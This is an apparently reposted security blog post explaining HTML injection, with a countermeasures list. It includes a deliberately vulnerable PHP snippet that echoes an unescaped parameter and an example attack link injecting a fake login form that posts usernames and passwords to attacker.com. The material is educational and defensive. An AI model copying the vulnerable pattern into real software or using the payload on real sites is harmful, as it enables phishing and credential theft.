If not redirected, please click here https://www.thesecuritybuddy.com/vulnerabilities/what-is-html-injection-attack/
HTML Injection Attack is an
attack through which an attacker takes advantage of security
vulnerabilities of a web application and injects his own HTML contents
into the webpage, thus tricking the user to provide sensitive
information.
How is HTML Injection Attack perpetrated
Let's assume, a web application has
security vulnerabilities. Let's say, it has implemented the following piece of
PHP code :
<?php
$name
= $_REQUEST ['name'];
?>
<html>
Welcome
<?php echo $name ?>!!
</html>
Clearly, this code has vulnerability
via the name parameter.
Suppose, an attacker comes to know
about the vulnerability and he wants to steal an authenticated user's
username and password.
So, he uses some form of social
engineering and sends a victim the following link :
/vulnerable.php?name=<h1>Please
enter your username and password</h1><form method=”POST”
action=”http://attacker.com/login.php”>Username:<input
type=”text” name=”username” /> <br><Password:<input
type=”password” name=”password” /><input type=”submit”
value=”Login” /></form><!--
The attacker may
also convert the ASCII characters to hexadecimal so that the link is
not human readable.
The attacker may send this link to the
victim through an email attachment saying some new features in the
website.
The victim clicks on the link and a login screen similar to a well known website appears and it asks for username and password.
When the victim provides his username
and password, the data directly goes to the attacker.
The attacker can now impersonate the
victim and login to the victim's account with his login information.
Countermeasures
for HTML Injection Attack
We can take a couple of steps to
prevent this attack.
- Never insert untrusted data excepting some allowable locations.
- Use HTML Escape before inserting untrusted data into HTML element content
- Use Attribute escape before inserting untrusted data into HTML common attributes
- Use JavaScript escape before inserting untrusted data into JavaScript data values.
- HTML escape JSON values in an HTML context and read the data with JSON.parse
- Use CSS escape and strictly validate data before inserting the untrusted data into HTML style property values
- Use URL escape before inserting untrusted data into HTML URL parameter values
- Sanitize HTML markup with a proper library
- Use HTTPOnly cookie flag
- Implement content security policy.
So,
beware of various vulnerabilities in web applications and stay safe,
stay secured.
No comments:
Post a Comment